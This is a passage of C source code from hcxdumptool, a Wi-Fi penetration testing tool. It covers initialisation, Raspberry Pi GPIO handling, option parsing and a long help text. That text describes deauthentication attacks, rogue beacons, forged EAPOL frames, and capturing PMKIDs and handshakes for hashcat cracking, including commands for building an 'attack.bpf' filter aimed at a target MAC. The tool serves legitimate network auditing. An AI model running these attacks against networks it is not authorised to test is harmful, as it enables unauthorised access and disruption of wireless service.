itimerspec tval1; if((fd_timer1 = timerfd_create(CLOCK_BOOTTIME, 0)) <0 ) return false; tval1.it_value.tv_sec = TIMER_RCA_VALUE_SEC; tval1.it_value.tv_nsec = TIMER_RCA_VALUE_NSEC; tval1.it_interval.tv_sec = TIMER_RCA_INTERVAL_SEC; tval1.it_interval.tv_nsec = TIMER_RCA_INTERVAL_NSEC; if(timerfd_settime(fd_timer1, 0, &tval1, NULL) == -1) return false; return true; } /*===========================================================================*/ /* SIGNALHANDLER */ static void signal_handler(int signum) { if((signum == SIGINT) || (signum == SIGTERM) || (signum == SIGKILL) || (signum == SIGTSTP)) wanteventflag |= EXIT_ON_SIGTERM; return; } /*---------------------------------------------------------------------------*/ static bool set_signal_handler(void) { struct sigaction sa; sa.sa_handler = signal_handler; sigemptyset(&sa.sa_mask); sa.sa_flags = SA_RESTART; if(sigaction(SIGINT, &sa, NULL) < 0) return false; if(sigaction(SIGTERM, &sa, NULL) < 0) return false; if(sigaction(SIGTSTP, &sa, NULL) < 0) return false; return true; } /*===========================================================================*/ static void init_values(void) { static size_t i; static struct timespec waitfordevice; waitfordevice.tv_sec = 1; waitfordevice.tv_nsec = 0; clock_gettime(CLOCK_REALTIME, &tspecakt); tsfirst = ((u64)tspecakt.tv_sec * 1000000000ULL) + tspecakt.tv_nsec; nanosleep(&waitfordevice, NULL); clock_gettime(CLOCK_REALTIME, &tspecakt); tsakt = ((u64)tspecakt.tv_sec * 1000000000ULL) + tspecakt.tv_nsec; tshold = ((u64)tspecakt.tv_sec * 1000000000ULL) + tspecakt.tv_nsec; strftime(timestring1, TIMESTRING_LEN, "%Y%m%d%H%M%S", localtime(&tspecakt.tv_sec)); seed += (unsigned int)tspecakt.tv_nsec & 0xffffffff; srand(seed); ouiaprg = (vendoraprg[rand() % ((VENDORAPRG_SIZE / sizeof(int)))]) &0xffffff; nicaprg = rand() & 0xffffff; macaprg[5] = nicaprg & 0xff; macaprg[4] = (nicaprg >> 8) & 0xff; macaprg[3] = (nicaprg >> 16) & 0xff; macaprg[2] = ouiaprg & 0xff; macaprg[1] = (ouiaprg >> 8) & 0xff; macaprg[0] = (ouiaprg >> 16) & 0xff; aprglist->tsakt = tsakt; aprglist->essidlen = strnlen(macaprgfirst, ESSID_MAX); memcpy(aprglist->essid, macaprgfirst, strnlen(macaprgfirst, ESSID_MAX)); memcpy(aprglist->macaprg, &macaprg, ETH_ALEN); nicaprg++; ouiclientrg = (vendorclientrg[rand() % ((VENDORCLIENTRG_SIZE / sizeof(int)))]) &0xffffff; nicclientrg = rand() & 0xffffff; macclientrg[7] = 0; macclientrg[6] = 0; macclientrg[5] = nicclientrg & 0xff; macclientrg[4] = (nicclientrg >> 8) & 0xff; macclientrg[3] = (nicclientrg >> 16) & 0xff; macclientrg[2] = ouiclientrg & 0xff; macclientrg[1] = (ouiclientrg >> 8) & 0xff; macclientrg[0] = (ouiclientrg >> 16) & 0xff; strncpy(weakcandidate, WEAKCANDIDATEDEF, PSK_MAX); replaycountrg = (rand() % 0xfff) + 0xf000; eapolm1data[0x17] = (replaycountrg >> 8) &0xff; eapolm1data[+0x18] = replaycountrg &0xff; for(i = 0; i < 32; i++) { anoncerg[i] = rand() % 0xff; eapolm1data[i + 0x19] = anoncerg[i]; snoncerg[i] = rand() % 0xff; } packetptr = &epb[EPB_SIZE]; memcpy(&wltxbuffer, &rthtxdata, RTHTX_SIZE); memcpy(&wltxnoackbuffer, &rthtxnoackdata, RTHTXNOACK_SIZE); memcpy(&epbown[EPB_SIZE], &rthtxdata, RTHTX_SIZE); #ifdef NMEAOUT memcpy(&gpwpl, &gpwplid, NMEA_GPWPLID_SIZE); memcpy(&gptxt, &gptxtid, NMEA_GPTXTID_SIZE); #endif return; } /*---------------------------------------------------------------------------*/ static void close_lists(void) { static size_t i; if(maclist != NULL) free(maclist); if(clientlist != NULL) free(clientlist); if(aprglist != NULL) free(aprglist); if(aplist != NULL) free(aplist); if(scanlist != NULL) free(scanlist); if(ifpresentlist != NULL) { for(i = 0; i < INTERFACELIST_MAX; i++) { if((ifpresentlist + i)->frequencylist != NULL) free((ifpresentlist + i)->frequencylist); } free(ifpresentlist); } return; } /*---------------------------------------------------------------------------*/ static void close_fds(void) { if(fd_timer1 != 0) close(fd_timer1); if(fd_pcapng != 0) close(fd_pcapng); #ifdef NMEAOUT if(fd_gps != 0) close(fd_gps); if(fd_hcxpos != 0) close(fd_hcxpos); #endif return; } /*---------------------------------------------------------------------------*/ static bool init_lists(void) { ssize_t i; if((scanlist = (frequencylist_t*)calloc(SCANLIST_MAX, FREQUENCYLIST_SIZE)) == NULL) return false; if((aplist = (aplist_t*)calloc(APLIST_MAX, APLIST_SIZE)) == NULL) return false; if((aprglist = (aprglist_t*)calloc(APRGLIST_MAX, APRGLIST_SIZE)) == NULL) return false; if((clientlist = (clientlist_t*)calloc(CLIENTLIST_MAX, CLIENTLIST_SIZE)) == NULL) return false; if((maclist = (maclist_t*)calloc(MACLIST_MAX, MACLIST_SIZE)) == NULL) return false; if((ifpresentlist = (interface_t*)calloc(INTERFACELIST_MAX, INTERFACELIST_SIZE)) == NULL) return false; for(i = 0; i < INTERFACELIST_MAX; i++) { if(((ifpresentlist + i)->frequencylist = (frequencylist_t*)calloc(FREQUENCYLIST_MAX, FREQUENCYLIST_SIZE)) == NULL) return false; } return true; } /*===========================================================================*/ static size_t chop(char *buffer, size_t len) { char *ptr = NULL; ptr = buffer +len - 1; while(len) { if(*ptr != '\n') break; *ptr-- = 0; len--; } while(len) { if(*ptr != '\r') break; *ptr-- = 0; len--; } return len; } /*---------------------------------------------------------------------------*/ static int fgetline(FILE *inputstream, size_t size, char *buffer) { size_t len = 0; char *buffptr = NULL; if(feof(inputstream)) return -1; buffptr = fgets(buffer, size, inputstream); if(buffptr == NULL) return -1; len = strlen(buffptr); len = chop(buffptr, len); return len; } /*===========================================================================*/ static bool read_bpf(char *bpfname) { static int len; static u16 c; static struct sock_filter *bpfptr; static FILE *fh_filter; static char linein[128]; if((fh_filter = fopen(bpfname, "r")) == NULL) return false; if((len = fgetline(fh_filter, 128, linein)) < 0) return false; sscanf(linein, "%"SCNu16, &bpf.len); if(bpf.len == 0) return false; bpf.filter = (struct sock_filter*)calloc(bpf.len, sizeof(struct sock_filter)); c = 0; bpfptr = bpf.filter; while(c < bpf.len) { if((len = fgetline(fh_filter, 128, linein)) == -1) { bpf.len = 0; break; } sscanf(linein, "%" SCNu16 "%" SCNu8 "%" SCNu8 "%" SCNu32, &bpfptr->code, &bpfptr->jt, &bpfptr->jf, &bpfptr->k); bpfptr++; c++; } if(bpf.len != c) return false; fclose(fh_filter); return true; } /*---------------------------------------------------------------------------*/ static void read_essidlist(char *listname) { static size_t i; static int len; static FILE *fh_essidlist; static char linein[ESSID_MAX]; if((fh_essidlist = fopen(listname, "r")) == NULL) { fprintf(stderr, "failed to open beacon list %s\n", listname); return; } i = 0; while(i < (APRGLIST_MAX - 1)) { if((len = fgetline(fh_essidlist, ESSID_MAX, linein)) == -1) break; if((len == 0) || (len > ESSID_MAX)) continue; (aprglist + i)->tsakt = tsakt -i; (aprglist + i)->essidlen = len; memcpy((aprglist + i)->essid, linein, len); (aprglist + i)->macaprg[5] = nicaprg & 0xff; (aprglist + i)->macaprg[4] = (nicaprg >> 8) & 0xff; (aprglist + i)->macaprg[3] = (nicaprg >> 16) & 0xff; (aprglist + i)->macaprg[2] = ouiaprg & 0xff; (aprglist + i)->macaprg[1] = (ouiaprg >> 8) & 0xff; (aprglist + i)->macaprg[0] = (ouiaprg >> 16) & 0xff; nicaprg++; i++; } (aprglist + i)->essidlen = 0; fclose(fh_essidlist); beaconindex = 0; return; } /*===========================================================================*/ /*===========================================================================*/ /* RASPBERRY PI */ static bool init_rpi(void) { static FILE *modinfo; static FILE *procinfo; static int fd_devinfo; static int len = 0; static unsigned int gpioperibase = 0; static char linein[RASPBERRY_INFO] = { 0 }; gpio_map = MAP_FAILED; if((modinfo = fopen("/proc/device-tree/model", "r")) == NULL) { perror("failed to get model information"); return false; } len = fgetline(modinfo, RASPBERRY_INFO, linein); fclose(modinfo); if(len < RPINAME_SIZE) return false; if(memcmp(&rpiname, &linein, RPINAME_SIZE) != 0) return false; if((procinfo = fopen("/proc/cpuinfo", "r")) != NULL) { while(1) { if((len = fgetline(procinfo, RASPBERRY_INFO, linein)) == -1) break; if(len > 8) { if(strstr(linein, "Serial") != NULL) { if(len > 8) seed += strtoul(&linein[len - 6], NULL, 16); } } } fclose(procinfo); } if((procinfo = fopen("/proc/iomem", "r")) != NULL) { while(1) { if((len = fgetline(procinfo, RASPBERRY_INFO, linein)) == -1) break; if(strstr(linein, ".gpio") != NULL) { if(linein[8] != '-') break; { linein[8] = 0; gpioperibase = strtoul(linein, NULL, 16); break; } } } fclose(procinfo); } if(gpioperibase != 0) { if((fd_devinfo = open("/dev/mem", O_RDWR | O_SYNC)) > 0) { gpio_map = mmap(NULL, RPI_BLOCK_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd_devinfo, gpioperibase); close(fd_devinfo); } } else { if((fd_devinfo = open("/dev/gpiomem", O_RDWR | O_SYNC)) > 0) { gpio_map = mmap(NULL, RPI_BLOCK_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd_devinfo, gpioperibase); close(fd_devinfo); } } if(gpio_map == MAP_FAILED) { fprintf(stderr, "failed to map GPIO memory\n"); return false; } gpio = (volatile unsigned *)gpio_map; if(gpiostatusled > 0) { INP_GPIO(gpiostatusled); OUT_GPIO(gpiostatusled); } if(gpiobutton > 0) INP_GPIO(gpiobutton); return true; } /*===========================================================================*/ /*===========================================================================*/ __attribute__ ((noreturn)) static inline void version(char *eigenname) { fprintf(stdout, "%s %s (C) %s ZeroBeat\n", eigenname, VERSION_TAG, VERSION_YEAR); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usage(char *eigenname) { fprintf(stdout, "%s %s (C) %s ZeroBeat\n" "usage: %s \n" " first stop all services that take access to the interface, e.g.:\n" " $ sudo systemctl stop NetworkManager.service\n" " $ sudo systemctl stop wpa_supplicant.service\n" " then run %s\n" " press ctrl+c to terminate\n" " press GPIO button to terminate\n" " hardware modification is necessary, read more:\n" " https://github.com/ZerBea/hcxdumptool/tree/master/docs\n" " stop all services (e.g.: wpa_supplicant.service, NetworkManager.service) that take access to the interface\n" " do not set monitor mode by third party tools (iwconfig, iw, airmon-ng)\n" " do not use logical (NETLINK) interfaces (monx, wlanxmon, prismx, ...) created by airmon-ng and iw\n" " do not use virtual machines or emulators\n" " do not run other tools that take access to the interface in parallel (except: tshark, wireshark, tcpdump)\n" " do not use tools to change MAC (like macchanger)\n" " do not merge (pcapng) dump files, because this destroys assigned hash values!\n" "\n" "short options:\n" "-i : name of INTERFACE to be used\n" " default: first suitable INTERFACE\n" " warning: %s changes the virtual MAC address of the INTERFACE\n" "-w : write packets to a pcapng-format file named \n" " default outfile name: yyyyddmmhhmmss-interfacename.pcapng\n" " get more information: https://pcapng.com/\n" "-c : set channel (1a,2a,36b...)\n" " default: 1a,6a,11a\n" " important notice: channel numbers are not unique\n" " it is mandatory to add band information to the channel number (e.g. 12a)\n" " band a: NL80211_BAND_2GHZ\n" " band b: NL80211_BAND_5GHZ\n" " band c: NL80211_BAND_6GHZ\n" " band d: NL80211_BAND_60GHZ\n" #if(LINUX_VERSION_CODE >= KERNEL_VERSION(5, 10, 0)) " band e: NL80211_BAND_S1GHZ (902 MHz)\n" #endif " to disable frequency management, set this option to a single frequency/channel\n" "-f : set frequency (2412,2417,5180,...)\n" "-F : use available frequencies from INTERFACE\n" "-t : minimum stay time (will increase on new stations and/or authentications)\n" " default %llu seconds\n" "-m : set monitor mode and terminate\n" "-p : do not set monitor mode: active (do not ACK incoming frames addressed to the device MAC)\n" " default monitor mode: active (ACK all incoming frames addressed to the device MAC)\n" "-L : show INTERFACE list\n" "-I : show detailed information about INTERFACE\n" "-h : show this help\n" "-v : show version\n" "\n", eigenname, VERSION_TAG, VERSION_YEAR, eigenname, eigenname, eigenname, TIMEHOLD / 1000000000ULL); fprintf(stdout, "long options:\n" "--bpf= : input kernel space Berkeley Packet Filter (BPF) code\n" " steps to create a BPF (it only has to be done once):\n" " $ %s -m \n" " create BPF to protect MACs\n" " $ tcpdump -i not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf\n" " recommended to protect own devices\n" " create BPF to attack a MAC\n" " $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 or wlan addr3 11:22:33:44:55:66 -ddd > attack.bpf\n" " it is strongly recommended to allow all PROBEREQUEST frames (wlan_type mgt && wlan_subtype probe-req)\n" " $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 or wlan addr3 11:22:33:44:55:66 or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf\n" " see man pcap-filter for a list of all filter options\n" " add BPF code: \n" " $ %s -i --bpf=attack.bpf ...\n" "--disable_beacon : do not transmit BEACON frames\n" "--disable_deauthentication : do not transmit DEAUTHENTICATION/DISASSOCIATION frames\n" "--disable_proberequest : do not transmit PROBEREQUEST frames\n" "--disable_association : do not AUTHENTICATE/ASSOCIATE\n" "--disable_reassociation : do not REASSOCIATE a CLIENT\n" "--beacontx= : transmit BEACON of first n entries of ESSID list\n" " default: %d\n" "--proberesponsetx= : transmit PROBERESPONSEs of first n entries of ESSID list\n" " default: %d\n" "--essidlist= : initialize ESSID list with these ESSIDs\n" "--errormax= : set maximum allowed ERRORs\n" " default: %d ERRORs\n" "--watchdogmax= : set maximum TIMEOUT when no packets received\n" " default: %d seconds\n" "--attemptclientmax= : set maximum of attempts to request an EAPOL M2\n" " default: %d attempts\n" " to disable CLIENT attacks set 0\n" "--attemptapmax= : set maximum of received BEACONs to request a PMKID or to get a 4-way handshake\n" " default: stop after %d received BEACONs\n" " attemptapmax=0 include this options:\n" " disable_deauthentication: do not transmit DEAUTHENTICATION/DISASSOCIATION frames\n" " disable_proberequest : do not transmit PROBEREQUEST frames\n" " disable_association : do not AUTHENTICATE/ASSOCIATE\n" " disable_reassociation : do not REASSOCIATE a CLIENT\n" "--tot= : enable timeout timer in minutes\n" "--onsigterm= : action when the program has been terminated (poweroff, reboot)\n" " poweroff: power off system\n" " reboot: reboot system\n" "--ongpiobutton= : action when the program has been terminated (poweroff, reboot)\n" " poweroff: power off system\n" " reboot: reboot system\n" "--ontot= : action when the program has been terminated (poweroff, reboot)\n" " poweroff: power off system\n" " reboot: reboot system\n" "--onwatchdog= : action when the program has been terminated (poweroff, reboot)\n" " poweroff: power off system\n" " reboot: reboot system\n" "--onerror= : action when the program has been terminated (poweroff, reboot)\n" " poweroff: power off system\n" " reboot: reboot system\n" "--gpio_button= : Raspberry Pi GPIO pin number of button (2...27)\n" " push GPIO button (> 10 seconds) to terminate program\n" " default: 0 (GPIO not in use)\n" "--gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27)\n" " default: 0 (GPIO not in use)\n" #ifdef NMEAOUT "--nmea_dev= : open NMEA device (/dev/ttyACM0, /dev/tty/USB0, ...)\n" " baudrate = BD9600\n" "--gpsd : use gpsd to get position\n" " gpsd will be switched to NMEA0183 mode\n" "--nmea_out= : write GPS information to a nmea-format file named \n" " default outfile name: yyyymmddhhmmss.nmea\n" " output: NMEA 0183 standard messages:\n" " $GPRMC: Position, velocity, time and date\n" " $GPGGA: Position, orthometric height, fix related data, time\n" " $GPWPL: Position and MAC AP\n" " $GPTXT: ESSID in HEX ASCII\n" " use gpsbabel to convert to other formats:\n" " gpsbabel -w -t -i nmea -f in_file.nmea -o gpx -F out_file.gpx\n" " gpsbabel -w -t -i nmea -f in_file.nmea -o kml -F out_file.kml\n" " get more information: https://en.wikipedia.org/wiki/NMEA_0183\n" "--nmea_pcapng : write GPS information to pcapng dump file\n" #endif "--rcascan= : do (R)adio (C)hannel (A)ssignment scan\n" " default = passive scan\n" " a = active scan\n" " p = passive scan\n" #ifdef STATUSOUT "--rds= : sort real time display\n" " default: sort by time (last seen on top)\n" " 1 = sort by status (last PMKID/EAPOL on top)\n" #endif "--help : show this help\n" "--version : show version\n" "\n", eigenname, eigenname, BEACONTX_MAX, PROBERESPONSETX_MAX, ERROR_MAX, WATCHDOG_MAX, ATTEMPTCLIENT_MAX, ATTEMPTAP_MAX / 8); fprintf(stdout, "Legend\n" "real time display:\n" " R = + AP display: AP is in TX range or under attack\n" " S = + AP display: AUTHENTICATION KEY MANAGEMENT PSK\n" " P = + AP display: got PMKID hashcat / JtR can work on\n" " 1 = + AP display: got EAPOL M1 (CHALLENGE)\n" " 3 = + AP display: got EAPOL M1M2M3 (AUTHORIZATION) hashcat / JtR can work on\n" " E = + CLIENT display: got EAP-START MESSAGE\n" " 2 = + CLIENT display: got EAPOL M1M2 (ROGUE CHALLENGE) hashcat / JtR can work on\n"); fprintf(stdout, "Notice:\n" "This is a penetration testing tool!\n" "It is made to detect vulnerabilities in your NETWORK mercilessly!\n" "To store entire traffic, run -w allframes.pcapng> in parallel\n" "\n"); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usageerror(char *eigenname) { fprintf(stdout, "%s %s (C) %s by ZeroBeat\n" "usage: %s -h for help\n", eigenname, VERSION_TAG, VERSION_YEAR, eigenname); exit(EXIT_FAILURE); } /*===========================================================================*/ int main(int argc, char *argv[]) { static int auswahl = -1; static int index = 0; static u8 exitsigtermflag = 0; static u8 exitgpiobuttonflag = 0; static u8 exittotflag = 0; static u8 exitwatchdogflag = 0; static u8 exiterrorflag = 0; static struct timespec tspecifo, tspeciforem; static bool monitormodeflag = false; static bool interfaceinfoflag = false; static bool interfacefrequencyflag = false; static bool interfacelistflag = false; static char *rcascanflag = NULL; static char *bpfname = NULL; static char *essidlistname = NULL; static char *userchannellistname = NULL; static char *userfrequencylistname = NULL; static char *pcapngoutname = NULL; #ifdef NMEAOUT static bool gpsdflag = false; static char *nmea0183name = NULL; static char *nmeaoutname = NULL; #endif static const char *rebootstring = "reboot"; static const char *poweroffstring = "poweroff"; static const char *short_options = "i:w:c:f:m:I:t:FLphv"; static const struct option long_options[] = { {"bpf", required_argument, NULL, HCX_BPF}, {"disable_beacon", no_argument, NULL, HCX_DISABLE_BEACON}, {"disable_deauthentication", no_argument, NULL, HCX_DISABLE_DEAUTHENTICATION}, {"disable_proberequest", no_argument, NULL, HCX_DISABLE_PROBEREQUEST}, {"disable_association", no_argument, NULL, HCX_DISABLE_ASSOCIATION}, {"disable_reassociation", no_argument, NULL, HCX_DISABLE_REASSOCIATION}, {"beacontx", required_argument, NULL, HCX_BEACONTX_MAX}, {"proberesponsetx", required_argument, NULL, HCX_PROBERESPONSETX_MAX}, {"attemptclientmax", required_argument, NULL, HCX_ATTEMPT_CLIENT_MAX}, {"attemptapmax", required_argument, NULL, HCX_ATTEMPT_AP_MAX}, {"tot", required_argument, NULL, HCX_TOT}, {"essidlist", required_argument, NULL, HCX_ESSIDLIST}, #ifdef NMEAOUT {"nmea_dev", required_argument, NULL, HCX_NMEA0183}, {"gpsd", no_argument, NULL, HCX_GPSD}, {"nmea_out", required_argument, NULL, HCX_NMEA0183_OUT}, {"nmea_pcapng", no_argument, NULL, HCX_NMEA0183_PCAPNG}, #endif {"errormax", required_argument, NULL, HCX_ERROR_MAX}, {"watchdogmax", required_argument, NULL, HCX_WATCHDOG_MAX}, {"onsigterm", required_argument, NULL, HCX_ON_SIGTERM}, {"ongpiobutton", required_argument, NULL, HCX_ON_GPIOBUTTON}, {"ontot", required_argument, NULL, HCX_ON_TOT}, {"onwatchdog", required_argument, NULL, HCX_ON_WATCHDOG}, {"onerror", required_argument, NULL, HCX_ON_ERROR}, {"gpio_button", required_argument, NULL, HCX_GPIO_BUTTON}, {"gpio_statusled", required_argument, NULL, HCX_GPIO_STATUSLED}, {"rcascan", required_argument, NULL, HCX_RCASCAN}, #ifdef STATUSOUT {"rds", required_argument, NULL, HCX_RD_SORT}, #endif {"version", no_argument, NULL, HCX_VERSION}, {"help", no_argument, NULL, HCX_HELP}, {NULL, 0, NULL, 0} }; optind = 1; optopt = 0; while((auswahl = getopt_long(argc, argv, short_options, long_options, &index)) != -1) { switch (auswahl) { case HCX_IFNAME: if((ifaktindex = if_nametoindex(optarg)) == 0) { perror("failed to get interface index"); exit(EXIT_FAILURE); } strncpy(ifaktname, optarg, IF_NAMESIZE -1); break; case HCX_BPF: bpfname = optarg; break; case HCX_PCAPNGNAME: pcapngoutname = optarg; break; case HCX_SET_SCANLIST_FROM_INTERFACE: interfacefrequencyflag = true; break; case HCX_SET_SCANLIST_FROM_USER_FREQ: userfrequencylistname = optarg; break; case HCX_SET_SCANLIST_FROM_USER_CH: userchannellistname = optarg; break; case HCX_ESSIDLIST: essidlistname = optarg; break; case HCX_DISABLE_BEACON: timerwaitnd = -1; break; case HCX_DISABLE_DEAUTHENTICATION: deauthenticationflag = false; break; case HCX_DISABLE_PROBEREQUEST: proberequestflag = false; break; case HCX_DISABLE_ASSOCIATION: associationflag = false; break; case HCX_DISABLE_REASSOCIATION: reassociationflag = false; break; case HCX_BEACONTX_MAX: beacontxmax = strtoul(optarg, NULL, 10); if((beacontxmax == 0) || (beacontxmax > (APRGLIST_MAX - 1))) { fprintf(stderr, "must be greater than > 0 and < than %d \n", APRGLIST_MAX - 1); exit(EXIT_FAILURE); } break; case HCX_PROBERESPONSETX_MAX: proberesponsetxmax = strtoul(optarg, NULL, 10); if((proberesponsetxmax == 0) || (proberesponsetxmax > (APRGLIST_MAX - 1))) { fprintf(stderr, "must be greater than > 0 and < than %d \n", APRGLIST_MAX - 1); exit(EXIT_FAILURE); } break; case HCX_ATTEMPT_CLIENT_MAX: attemptclientmax = strtoul(optarg, NULL, 10); break; case HCX_ATTEMPT_AP_MAX: if((attemptapmax = strtoul(optarg, NULL, 10)) > 0) attemptapmax *= 8; else { deauthenticationflag = false; proberequestflag = false; associationflag = false; reassociationflag = false; } break; case HCX_HOLD_TIME: if((timehold = strtoull(optarg, NULL, 10)) < 2) { fprintf(stderr, "hold time must be > 2 seconds"); exit(EXIT_FAILURE); } timehold *= 1000000000ULL; break; case HCX_TOT: if((tottime = strtoul(optarg, NULL, 10)) < 1) { fprintf(stderr, "time out timer must be > 0 minutes\n"); exit(EXIT_FAILURE); } tottime *= 60; break; case HCX_WATCHDOG_MAX: if((watchdogcountmax = strtoul(optarg, NULL, 10)) < 1) { fprintf(stderr, "time out timer must be > 0\n"); exit(EXIT_FAILURE); } break; case HCX_ERROR_MAX: if((errorcountmax = strtoul(optarg, NULL, 10)) < 1) { fprintf(stderr, "error counter must be > 0\n"); exit(EXIT_FAILURE); } break; case HCX_ON_SIGTERM: if(strncmp(rebootstring, optarg, 8) == 0) exitsigtermflag = EXIT_ACTION_REBOOT; else if(strncmp(poweroffstring, optarg, 8) == 0) exitsigtermflag = EXIT_ACTION_POWEROFF; break; case HCX_ON_GPIOBUTTON: if(strncmp(rebootstring, optarg, 8) == 0) exitgpiobuttonflag = EXIT_ACTION_REBOOT; else if(strncmp(poweroffstring, optarg, 8) == 0) exitgpiobuttonflag = EXIT_ACTION_POWEROFF; break; case HCX_ON_TOT: if(strncmp(rebootstring, optarg, 8) == 0) exittotflag = EXIT_ACTION_REBOOT; else if(strncmp(poweroffstring, optarg, 8) == 0) exittotflag = EXIT_ACTION_POWEROFF; break; case HCX_ON_WATCHDOG: if(strncmp(rebootstring, optarg, 8) == 0) exitwatchdogflag = EXIT_ACTION_REBOOT; else if(strncmp(poweroffstring, optarg, 8) == 0) exitwatchdogflag = EXIT_ACTION_POWEROFF; break; case HCX_ON_ERROR: if(strncmp(rebootstring, optarg, 8) == 0) exiterrorflag = EXIT_ACTION_REBOOT; else if(strncmp(poweroffstring, optarg, 8) == 0) exiterrorflag = EXIT_ACTION_POWEROFF; break; case HCX_GPIO_BUTTON: gpiobutton = strtol(optarg, NULL, 10); if((gpiobutton < 2) || (gpiobutton > 27)) { fprintf(stderr, "invalid GPIO option\n"); exit(EXIT_FAILURE); } if(gpiostatusled == gpiobutton) { fprintf(stderr, "GPIO pin ERROR (same value of GPIO button and GPIO status LED)\n"); exit(EXIT_FAILURE); } break; case HCX_GPIO_STATUSLED: gpiostatusled = strtol(optarg, NULL, 10); if((gpiostatusled < 2) || (gpiostatusled > 27)) { fprintf(stderr, "invalid GPIO option\n"); exit(EXIT_FAILURE); } if(gpiostatusled == gpiobutton) { fprintf(stderr, "GPIO pin ERROR (same value of GPIO button and GPIO status LED)\n"); exit(EXIT_FAILURE); } break; case HCX_INTERFACE_INFO: if((ifaktindex = if_nametoindex(optarg)) == 0) { perror("failed to get interface index"); exit(EXIT_FAILURE); } strncpy(ifaktname, optarg, IF_NAMESIZE -1); interfaceinfoflag = true; break; case HCX_SET_MONITORMODE: if((ifaktindex = if_nametoindex(optarg)) == 0) { perror("failed to get interface index"); exit(EXIT_FAILURE); } strncpy(ifaktname, optarg, IF_NAMESIZE -1); monitormodeflag = true; break; case HCX_SHOW_INTERFACE_LIST: interfacelistflag = true; break; #ifdef NMEAOUT case HCX_NMEA0183: if(gpsdflag == true) { fprintf(stderr, "nmea_dev not allowed in combination with gpsd\n"); exit(EXIT_FAILURE); } nmea0183name = optarg; break; case HCX_GPSD: if(nmea0183name != NULL) { fprintf(stderr, "gpsd not allowed in combination with nmea_dev\n"); exit(EXIT_FAILURE); } gpsdflag = true; break; case HCX_NMEA0183_OUT: nmeaoutname = optarg; break; case HCX_NMEA0183_PCAPNG: nmea2pcapflag = true; break; #endif case HCX_RCASCAN: rcascanflag = optarg; if((rcascanflag[0] != 'a') && (rcascanflag[0] != 'p')) { fprintf(stderr, "rcascan: only (a) active or (p) passive allowed\n"); exit(EXIT_FAILURE); } break; #ifdef STATUSOUT case HCX_RD_SORT: rdsort = strtol(optarg, NULL, 10); break; #endif case HCX_SET_MONITORMODE_PASSIVE: activemonitorflag = false; break; case HCX_HELP: usage(basename(argv[0])); break; case HCX_VERSION: version(basename(argv[0])); break; case '?': usageerror(basename(argv[0])); break; default: usageerror(basename(argv[0])); } } setbuf(stdout, NULL); hcxpid = getpid(); fprintf(stdout, "\nRequesting interface capabilities. This may take some time.\n" "Please be patient...\n\n"); if(set_signal_handler() == false) { errorcount++; fprintf(stderr, "failed to initialize signal handler\n"); goto byebye; } if((gpiobutton + gpiostatusled) > 0) { if(init_rpi() == false) { errorcount++; fprintf(stderr, "failed to initialize Raspberry Pi GPIO\n"); goto byebye; } } if(init_lists() == false) { errorcount++; fprintf(stderr, "failed to initialize lists\n"); goto byebye; } init_values(); #ifdef NMEAOUT if(nmea0183name != NULL) { if(open_device_nmea0183(nmea0183name, nmeaoutname) == false) { errorcount++; fprintf(stderr, "failed to open NMEA0183 device\n"); goto byebye; } } if(gpsdflag == true) { if(open_socket_gpsd(nmeaoutname) == false) { errorcount++; fprintf(stderr, "failed to connect to GPSD\n"); goto byebye; } } #endif /*---------------------------------------------------------------------------*/ if(open_control_sockets() == false) { errorcount++; fprintf(stderr, "failed to open control sockets\n"); goto byebye; } if(get_interfacelist() == false) { errorcount++; fprintf(stderr, "failed to get interface list\n"); goto byebye; } if(interfacelistflag == true) { show_interfacelist(); goto byebye; } if(interfaceinfoflag == true) { show_interfacecapabilities(); goto byebye; } /*---------------------------------------------------------------------------*/ if(getuid() != 0) { errorcount++; fprintf(stderr, "%s must be run as root\n", basename(argv[0])); goto byebye; } if(monitormodeflag == true) { if(set_monitormode() == false) { errorcount++; fprintf(stderr, "failed to set monitor mode\n"); } goto byebye; } if(set_interface(interfacefrequencyflag, userfrequencylistname, userchannellistname) == false) { errorcount++; fprintf(stderr, "failed to arm interface\n"); goto byebye; } if(essidlistname != NULL) read_essidlist(essidlistname); if(rcascanflag == NULL) { if(open_pcapng(pcapngoutname) == false) { errorcount++; fprintf(stderr, "failed to open dump file\n"); goto byebye; } } if(open_socket_rx(bpfname) == false) { errorcount++; fprintf(stderr, "failed to open raw packet socket\n"); goto byebye; } if(open_socket_tx() == false) { errorcount++; fprintf(stderr, "failed to open transmit socket\n"); goto byebye; } if(rcascanflag == NULL) { if(set_timer() == false) { errorcount++; fprintf(stderr, "failed to initialize timer\n"); goto byebye; } } else { if(set_timer_rca() == false) { errorcount++; fprintf(stderr, "failed to initialize timer\n"); goto byebye; } } /*---------------------------------------------------------------------------*/ tspecifo.tv_sec = 5; tspecifo.tv_nsec = 0; fprintf(stdout, "\nThis is a highly experimental penetration testing tool!\n" "It is made to detect vulnerabilities in your NETWORK mercilessly!\n\n"); if(bpf.len == 0) fprintf(stderr, "BPF is unset! Make sure hcxdumptool is running in a 100%% controlled environment!\n\n"); fprintf(stdout, "Initialize main scan loop...\e[?25l"); nanosleep(&tspecifo, &tspeciforem); if(rcascanflag == NULL) { if(nl_scanloop() == false) { errorcount++; fprintf(stderr, "failed to initialize main scan loop\n"); } } else { if(nl_scanloop_rca(rcascanflag) == false) { errorcount++; fprintf(stderr, "failed to initialize rca scan loop\n"); } } /*---------------------------------------------------------------------------*/ byebye: close_fds(); close_sockets(); close_lists(); if(errorcount > 0) fprintf(stderr, "\n%" PRIu64 " errors during runtime\n", errorcount); if((wanteventflag & EXIT_ON_SIGTERM) == EXIT_ON_SIGTERM) { fprintf(stdout, "\nexit on sigterm\n"); if(exitsigtermflag == EXIT_ACTION_REBOOT) { if(system("reboot") != 0) fprintf(stderr, "\ncan't reboot system\n"); } else if(exitsigtermflag == EXIT_ACTION_POWEROFF) { if(system("poweroff") != 0) fprintf(stderr, "\ncan't power off\n"); } } else if((wanteventflag & EXIT_ON_GPIOBUTTON) == 